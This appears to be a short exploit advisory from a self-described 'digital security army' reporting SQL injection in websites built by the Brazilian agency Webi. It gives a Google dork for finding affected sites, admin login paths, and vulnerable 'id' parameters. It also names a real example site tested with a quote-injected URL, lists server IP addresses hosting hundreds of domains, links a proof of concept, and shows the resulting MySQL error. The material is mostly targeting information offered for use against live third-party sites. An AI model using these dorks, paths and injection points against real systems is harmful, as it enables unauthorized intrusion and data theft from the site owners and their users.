Desenvolvimento Agência IndustriaWeb Webi.Com.Br SQL Inj

1. #################################################################
2.  
3. # Exploit Title : Desenvolvimento Agência IndustriaWeb Webi.Com.Br SQL Injection
4. # Author [ Discovered By ] : KingSkrupellos
5. # Team : Cyberizm Digital Security Army
6. # Date : 11/01/2019
7. # Vendor Homepage : webi.com.br
8. # Tested On : Windows and Linux
9. # Category : WebApps
10. # Exploit Risk : Medium
11. # Google Dorks : intext:"Desenvolvido por WEBI" site:br
12. # Vulnerability Type : CWE-89 [ Improper Neutralization of
13. Special Elements used in an SQL Command ('SQL Injection') ]
14.  
15. #################################################################
16.  
17. # Admin Panel Login Path :
18. *************************
19.  
20. /sacwebi/
21. /wp-login.php
22.  
23. # SQL Injection Exploit :
24. ***********************
25.  
26. /site/ver_evento.php?id=[SQL Injection]
27.  
28. /site/ver_galeria.php?id=[SQL Injection]
29.  
30. /wp-content/themes/CherryFramework/index.php?id=[SQL Injection]
31.  
32. #################################################################
33.  
34. # Example Vulnerable Site :
35. *************************
36. Note => (186.202.153.171) => There are 882 domains hosted on this server.
37.  
38. Note => (177.70.25.35) => There are 28 domains hosted on this server.
39.  
40. [+] ajut.org.br/site/ver_evento.php?id=299%27 =>
41.  
42. [ Proof of Concept for SQL Inj ] => archive.fo/vSgnj
43.  
44. #################################################################
45.  
46. # SQL Database Error :
47. **********************
48.  
49. You have an error in your SQL syntax; check the manual that
50. corresponds to your MySQL server version for the right
51. syntax to use near ''299''' at line 1
52.  
53. #################################################################
54.  
55. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
56.  
57. #################################################################